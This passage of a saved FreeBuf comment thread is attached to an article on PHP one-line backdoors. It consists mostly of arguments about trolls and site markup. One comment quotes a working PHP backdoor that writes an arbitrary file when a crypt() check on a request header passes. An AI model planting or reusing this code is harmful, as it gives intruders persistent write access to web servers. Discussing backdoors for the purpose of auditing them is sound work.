	    <span class="name"> <a href="http://www.freebuf.com/author/anlfi" target="_blank">anlfi&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(5级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-12</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		           <a onclick="return addComment.moveForm( &#39;comment-9136&#39;,&#39;9033&#39;, &#39;respond&#39;,&#39;9396&#39; )" href="http://www.freebuf.com/articles/web/9396.html?replytocom=9136#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@Mystery。&nbsp;<br>
十分赞同！对于喷子最好的办法就是不回复，<br>
网络上充斥着各种垃圾信息，就是因为总有人回复喷子结果雪球越滚越大<br>
照成网络垃圾，只要大家行动起来少回一次喷子，就能创建美好网络环境<br>
对于喷子大家只要不回复 对方就会自觉无趣 以此逐渐减少喷子的数量<br>
这样自己也能舒心多了<br>
对付喷子人人有责</p>
<div class="comment-tools">
<div class="vote" id="vote-9136"><span id="acv_stat_9136"></span><a class="ilike_icon" id="vote4-9136" href="javascript:acv_vote(9136,1);">亮了</a>(<span id="cos_support-9136">6</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9136" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9136" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9136" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9136" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9136" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
<li class="comment odd alt depth-2" id="li-comment-9057">
    <div id="comment-9057">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic15.png">     </div>
    <div class="tit"> 
	    <span class="name"> 呵呵 </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9057&#39;,&#39;9057&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9057#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@anlfi&nbsp;   只能对你说呵呵。那你放个更牛逼的几十种方法出来啊！光说不练，装逼犯</p>
<div class="comment-tools">
<div class="vote" id="vote-9057"><span id="acv_stat_9057"></span><a class="ilike_icon" id="vote4-9057" href="javascript:acv_vote(9057,1);">亮了</a>(<span id="cos_support-9057">7</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9057" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9057" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9057" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9057" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9057" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment even depth-3" id="li-comment-9102">
    <div id="comment-9102">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic9.png">     </div>
    <div class="tit"> 
	    <span class="name"> 楼上是傻X </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		           <a onclick="return addComment.moveForm( &#39;comment-9102&#39;,&#39;9057&#39;, &#39;respond&#39;,&#39;9396&#39; )" href="http://www.freebuf.com/articles/web/9396.html?replytocom=9102#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@呵呵 你更装 说别人你提出一点有用的东西啊?</p>
<div class="comment-tools">
<div class="vote" id="vote-9102"><span id="acv_stat_9102"></span><a class="ilike_icon" id="vote4-9102" href="javascript:acv_vote(9102,1);">亮了</a>(<span id="cos_support-9102">5</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9102" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9102" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9102" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9102" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9102" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment byuser comment-author-Mystery odd alt depth-3" id="li-comment-9132">
    <div id="comment-9132">
        <div class="photo"> <a href="http://www.freebuf.com/author/Mystery%E3%80%82">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/20150329151400763592.png.gif"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/Mystery%E3%80%82" target="_blank">Mystery。&nbsp;</a>  </span>
        		
		<span class="icon-f"> <a href="http://www.freebuf.com/bufer" target="_blank"><img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/f1.png" title="认证作者"></a></span>
		<span class="rank">(6级)</span>
				<span class="explain"> 肆零叁文化传媒 COO </span>
		<span class="time">&nbsp;2013-05-12</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		           <a onclick="return addComment.moveForm( &#39;comment-9132&#39;,&#39;9057&#39;, &#39;respond&#39;,&#39;9396&#39; )" href="http://www.freebuf.com/articles/web/9396.html?replytocom=9132#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@呵呵 对于喷子最大的回应就是不说话。</p>
<div class="comment-tools">
<div class="vote" id="vote-9132"><span id="acv_stat_9132"></span><a class="ilike_icon" id="vote4-9132" href="javascript:acv_vote(9132,1);">亮了</a>(<span id="cos_support-9132">4</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9132" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9132" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9132" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9132" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9132" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
<li class="comment byuser comment-author-2462 even thread-odd thread-alt depth-1" id="li-comment-9044">
    <div id="comment-9044">
        <div class="photo"> <a href="http://www.freebuf.com/author/%E8%90%BD%E5%8F%B6%E7%BA%B7%E9%A3%9E">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/%E8%90%BD%E5%8F%B6%E7%BA%B7%E9%A3%9E" target="_blank">落叶纷飞&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(2级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9044&#39;,&#39;9044&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9044#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">2楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>“最起码要做到间接利用根据程序本身设计后门”</p>
<p>那这篇文章该怎么写？</p>
<p>“所谓的强悍 也不过就是方法不同而已 这么多函数 完全可以有N种方法组合自己后门”</p>
<p>求不用任何函数不用任何代码实现的后门</p>
<div class="comment-tools">
<div class="vote" id="vote-9044"><span id="acv_stat_9044"></span><a class="ilike_icon" id="vote4-9044" href="javascript:acv_vote(9044,1);">亮了</a>(<span id="cos_support-9044">7</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9044" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9044" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9044" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9044" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9044" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment byuser comment-author-oooceo bypostauthor odd alt depth-2" id="li-comment-9045">
    <div id="comment-9045">
        <div class="photo"> <a href="http://www.freebuf.com/author/oooceo">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/oooceo" target="_blank">oooceo&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9045&#39;,&#39;9045&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9045#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@落叶纷飞&nbsp;  以宏观方向展示了各种DIY出来的后门，本文并非是抽象的拿某一例来编写特定后门，所以不要太挑剔，现在的ecshop存在两个内核级后门你能读出来吗？之前被一牛读出来官方死不承认，还有一个一直没人爆出来，强悍不能单一的抽象某个例子。</p>
<div class="comment-tools">
<div class="vote" id="vote-9045"><span id="acv_stat_9045"></span><a class="ilike_icon" id="vote4-9045" href="javascript:acv_vote(9045,1);">亮了</a>(<span id="cos_support-9045">28</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9045" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9045" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9045" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9045" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9045" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment even depth-3" id="li-comment-9053">
    <div id="comment-9053">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic3.png">     </div>
    <div class="tit"> 
	    <span class="name"> 马路一号 </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		           <a onclick="return addComment.moveForm( &#39;comment-9053&#39;,&#39;9045&#39;, &#39;respond&#39;,&#39;9396&#39; )" href="http://www.freebuf.com/articles/web/9396.html?replytocom=9053#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@oooceo&nbsp;  内核级什么意思？</p>
<div class="comment-tools">
<div class="vote" id="vote-9053"><span id="acv_stat_9053"></span><a class="ilike_icon" id="vote4-9053" href="javascript:acv_vote(9053,1);">亮了</a>(<span id="cos_support-9053">4</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9053" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9053" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9053" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9053" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9053" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment byuser comment-author-2462 odd alt depth-3" id="li-comment-9105">
    <div id="comment-9105">
        <div class="photo"> <a href="http://www.freebuf.com/author/%E8%90%BD%E5%8F%B6%E7%BA%B7%E9%A3%9E">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/%E8%90%BD%E5%8F%B6%E7%BA%B7%E9%A3%9E" target="_blank">落叶纷飞&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(2级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-11</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		           <a onclick="return addComment.moveForm( &#39;comment-9105&#39;,&#39;9045&#39;, &#39;respond&#39;,&#39;9396&#39; )" href="http://www.freebuf.com/articles/web/9396.html?replytocom=9105#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@oooceo&nbsp;  你看清楚我评论的是啥，喷你的人在上面，哥哥!!</p>
<div class="comment-tools">
<div class="vote" id="vote-9105"><span id="acv_stat_9105"></span><a class="ilike_icon" id="vote4-9105" href="javascript:acv_vote(9105,1);">亮了</a>(<span id="cos_support-9105">3</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9105" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9105" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9105" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9105" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9105" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment byuser comment-author-anlfi even depth-3" id="li-comment-9114">
    <div id="comment-9114">
        <div class="photo"> <a href="http://www.freebuf.com/author/anlfi">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/20130928021210.jpg"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/anlfi" target="_blank">anlfi&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(5级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-11</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		           <a onclick="return addComment.moveForm( &#39;comment-9114&#39;,&#39;9045&#39;, &#39;respond&#39;,&#39;9396&#39; )" href="http://www.freebuf.com/articles/web/9396.html?replytocom=9114#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@oooceo&nbsp;<br>
求解怎么建力数学模 来解决抽象问题<br>
微观粒子运动可测吗 求解重力的的最小微粒是怎么样的纯在</p>
<p>其实这些后门在以前都用过了 但写出来对作者有什么意义呢？呵呵</p>
<p>@落叶纷飞<br>
你是笨蛋吗<br>
所有人都以自己的方式去理解对方的语言以及世界 所以每个人都能读出不同的含义<br>
文章也是如此 所以只要去取自己有用的部分即可<br>
就像我和你没有关系一样 所有人都是如此<br>
看起来比较孤独 但其实人生就是这样 直到最后也就只有你自己知道死的含义一样<br>
哪怕你再疼苦也不会有人知道你有多疼<br>
所以会诞生除2种性格 最求纯在感 藐视一切纯在 当然还有无所谓 的因为现实就是如此</p>
<p>世界就像是一个微观世界 充满随机性 充满思想的碰撞 写文章有意义吗 国家有意义吗 军队有意义吗<br>
一切只是你认为很重要的东西 你才会去做<br>
至于意义就是你去做了并且 获得了什么 达成了什么目的 或者就是为了好玩<br>
然而对于普通人这些根本和他们没有关系<br>
补充一个吧<br>
toby57 早期用的后门<br>
&lt;?php<br>
if(crypt($_SERVER['HTTP_H0ST'],51)==’514zR17F8j0q6′){@file_put_contents($_SERVER['HTTP_X'],$_SERVER['HTTP_Y']);header("Location: ./".$_SERVER['HTTP_X']);};<br>
?&gt;<br>
后门的方式随机性太多了 你怎么不去一个一个说出来<br>
所以我认为你很有意思 可以玩一玩<br>
但其实和我也没什么关系呢</p>
<p>不知道你是 在乎别人对你的存在感 还是无所谓呢呵呵<br>
或者面对如此寂寞的世界无视一切<br>
只最求一样东西呢<br>
其实我的回复就只是玩一玩 看看到底是你们回复的多还是我回复的多<br>
又或者引导出你们的内心 然后出现引导出大量回复来分析人性<br>
不得不说社交的确是一种进步 就算你怎么了解人性 你也不知道它的魅力所在</p>
<div class="comment-tools">
<div class="vote" id="vote-9114"><span id="acv_stat_9114"></span><a class="ilike_icon" id="vote4-9114" href="javascript:acv_vote(9114,1);">亮了</a>(<span id="cos_support-9114">12</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9114" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9114" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9114" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9114" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9114" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
<li class="comment byuser comment-author-oooceo bypostauthor odd alt depth-2" id="li-comment-9107">
    <div id="comment-9107">
        <div class="photo"> <a href="http://www.freebuf.com/author/oooceo">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/oooceo" target="_blank">oooceo&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-11</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9107&#39;,&#39;9107&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9107#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@落叶纷飞&nbsp;  啊，我知道啊，我是不想回复他们，所以引用了你的回复加以说明，你不要误会哦，我明白汉字的博大，不会这么弱弱的，谢谢！</p>
<div class="comment-tools">
<div class="vote" id="vote-9107"><span id="acv_stat_9107"></span><a class="ilike_icon" id="vote4-9107" href="javascript:acv_vote(9107,1);">亮了</a>(<span id="cos_support-9107">3</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9107" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9107" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9107" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9107" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9107" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment even depth-2" id="li-comment-9251">
    <div id="comment-9251">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic18.png">     </div>
    <div class="tit"> 
	    <span class="name"> ? </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-14</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9251&#39;,&#39;9251&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9251#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor"></span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>@落叶纷飞&nbsp;  飞哥说的对，支持。</p>
<div class="comment-tools">
<div class="vote" id="vote-9251"><span id="acv_stat_9251"></span><a class="ilike_icon" id="vote4-9251" href="javascript:acv_vote(9251,1);">亮了</a>(<span id="cos_support-9251">1</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9251" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9251" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9251" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9251" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9251" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
</ul><!-- .children -->
</li><!-- #comment-## -->
<li class="comment odd alt thread-even depth-1" id="li-comment-9049">
    <div id="comment-9049">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic15.png">     </div>
    <div class="tit"> 
	    <span class="name"> 123 </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9049&#39;,&#39;9049&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9049#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">3楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>比较全面<br>
赞一个</p>
<div class="comment-tools">
<div class="vote" id="vote-9049"><span id="acv_stat_9049"></span><a class="ilike_icon" id="vote4-9049" href="javascript:acv_vote(9049,1);">亮了</a>(<span id="cos_support-9049">2</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9049" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9049" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9049" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9049" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9049" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment even thread-odd thread-alt depth-1" id="li-comment-9050">
    <div id="comment-9050">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic3.png">     </div>
    <div class="tit"> 
	    <span class="name"> 宋兵乙 </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9050&#39;,&#39;9050&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9050#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">4楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>最近emlog和hdwiki放的后门真是太明显~~</p>
<div class="comment-tools">
<div class="vote" id="vote-9050"><span id="acv_stat_9050"></span><a class="ilike_icon" id="vote4-9050" href="javascript:acv_vote(9050,1);">亮了</a>(<span id="cos_support-9050">5</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9050" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9050" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9050" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9050" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9050" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
</li><!-- #comment-## -->
<li class="comment odd alt thread-even depth-1" id="li-comment-9052">
    <div id="comment-9052">
        <div class="photo">     <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/pic10.png">     </div>
    <div class="tit"> 
	    <span class="name"> 颓废傻鱼 </span>
        		<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
		<span class="time"> </span>
        <span class="useragent_output_custom"></span>
        <span class="useragent_output_custom"></span> 
		<span class="reply">
		        <!-- 正常情况 -->
           <a onclick="return addComment.moveForm( &#39;comment-9052&#39;,&#39;9052&#39;, &#39;respond&#39;,&#39;9396&#39; ) " href="http://www.freebuf.com/articles/web/9396.html?replytocom=9052#respond" class="comment-reply-link" rel="nofollow">回复</a>
        	    </span>
		<span class="floor">5楼</span>
	</div>
	    <div class="txt">
	  <p class="useragent_output_custom"></p>
      <p>都会带Get和Post获取数据，人工审计只要审计这些$_Get和$_Post就可以了，要想隐藏的很好，还是要根据环境来，结合好了，基本很难读出来，除非执行调试</p>
<div class="comment-tools">
<div class="vote" id="vote-9052"><span id="acv_stat_9052"></span><a class="ilike_icon" id="vote4-9052" href="javascript:acv_vote(9052,1);">亮了</a>(<span id="cos_support-9052">2</span>)</div>
<div class="dropup"><a class="dropdown-toggle btn-report" type="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" style="display:none;"> 举报</a>
<ul class="dropdown-menu" style="display:none;bottom:auto;">
<li><a data-id="9052" class="click_report" href="javascript:;">广告等垃圾信息</a></li>
<li><a data-id="9052" class="click_report" href="javascript:;">不友善内容</a></li>
<li><a data-id="9052" class="click_report" href="javascript:;">违反法律法规的内容</a></li>
<li><a data-id="9052" class="click_report" href="javascript:;">不宜公开讨论的政治内容</a></li>
<li><a data-id="9052" class="click_report" href="javascript:;">其他</a></li>
</ul></div>
</div>
	</div></div>
<ul class="children">
<li class="comment byuser comment-author-oooceo bypostauthor even depth-2" id="li-comment-9060">
    <div id="comment-9060">
        <div class="photo"> <a href="http://www.freebuf.com/author/oooceo">
    <img src="./那些强悍的PHP一句话后门 - FreeBuf.COM _ 关注黑客与极客_files/wp-user-avatar-96x96.png"></a>
     </div>
    <div class="tit"> 
	    <span class="name"> <a href="http://www.freebuf.com/author/oooceo" target="_blank">oooceo&nbsp;</a>  </span>
        		
		<span class="icon-f"> </span>
		<span class="rank">(1级)</span>
				<span class="explain">  </span>
		<span class="time">&nbsp;2013-05-10</span>
